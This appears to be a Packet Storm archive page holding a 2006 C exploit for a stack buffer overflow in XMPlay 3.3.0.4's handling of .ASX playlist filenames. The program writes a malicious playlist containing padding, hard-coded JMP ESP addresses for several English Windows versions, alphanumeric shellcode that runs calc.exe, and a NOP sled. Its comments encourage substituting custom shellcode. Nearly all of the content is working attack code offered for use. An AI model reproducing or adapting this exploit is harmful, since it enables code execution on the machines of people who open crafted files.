what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

xmplay-2.txt

xmplay-2.txt
Posted Nov 22, 2006
Authored by Greg Linares

XMPlay version 3.3.0.4 .ASX filename local buffer overflow exploit that executes CALC.exe.

tags | exploit, overflow, local
SHA-256 | 13b97521a139cc19571c37602af2fe403fbb1a249cb3da57cb484f4eed48a42b

xmplay-2.txt

Change Mirror Download
/*
===================================================================
0-day XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit
===================================================================
XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow when
loading malformed .ASX files

This merely executes CALC.exe but you could always add your own custom
shellcode (alpha2)

===============
ASX
<ASX VERSION="3">
<ENTRY>
<REF HREF="file://[EXPLOIT HERE]"
</ENTRY>
</ASX>
===============


Reported Exploit Date: 11/21/2006

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{

FILE *Exploit;
char buffer[512];

/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders <expanders[at]gmail[dot]com> */
unsigned char scode[] =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
"LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
"sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";



char NOPSled[50];
char tail[] = ".mid\x22\r\n";
int JMP, x;

printf("\n======================================================================\n");
printf("XMPlay 3.3.0.4 and prior ASX Filename Buffer Overflow Exploit\n");
printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com>\n");
printf("Usage: %s <output ASX file> <JMP>\n", argv[0]);
printf("\n JMP Options\n");
printf("1 = English Windows XP SP 2 User32.dll <JMP ESP 0x77db41bc>\n");
printf("2 = English Windows XP SP 1 User32.dll <JMP ESP 0x77d718fc>\n");
printf("3 = English Windows 2003 SP0 and SP1 User32.dll <JMP ESP 0x77d74adc>\n");
printf("4 = English Windows 2000 SP 4 User32.dll <JMP ESP 0x77e3c256>\n");
printf("====================================================================\n\n\n");


if (argc < 2) {
printf("Invalid Number Of Arguments\n");
return 1;
}


Exploit = fopen(argv[1],"w");
if ( !Exploit )
{
printf("\nCouldn't Open File!");
return 1;
}

memset(buffer, 0, 505);
memset(NOPSled, 0, 20);


fputs("<ASX VERSION=\x22\x33\x22>\r\n<ENTRY>\r\n", Exploit);
fputs("<REF HREF=\x22", Exploit);
fputs("file://C:\\", Exploit);

for (x=0;x<498;x++) {
strcat(buffer, "A");
}

fputs(buffer, Exploit);
if (atoi(argv[2]) <= 0) {
JMP = 1;
} else if (atoi(argv[2]) > 4) {
JMP = 1;
} else {
JMP = atoi(argv[2]);
}
switch(JMP) {
case 1:
printf("Using English Windows XP SP2 JMP...\n");
fputs("\xbc\x41\xdb\x77", Exploit);
break;
case 2:
printf("Using English Windows XP SP1 JMP...\n");
fputs("\xfc\x18\xd7\x77", Exploit);
break;
case 3:
printf("Using English Windows 2003 SP0 & SP1 JMP...\n");
fputs("\xdc\x4a\xd7\x77", Exploit);
break;
case 4:
printf("Using English Windows 2000 SP 4 JMP...\n");
fputs("\x56\xc2\xe3\x77", Exploit);
break;
}

fputs(scode, Exploit);

for (x=0;x<20;x++) {
strcat(NOPSled, "\x90");
}

fputs(NOPSled, Exploit);
fputs(tail, Exploit);
fputs("</ENTRY>\r\n</ASX>\r\n", Exploit);



printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);


printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\n");
printf("Greetz to: Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\n");

fclose(Exploit);
return 0;
}

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close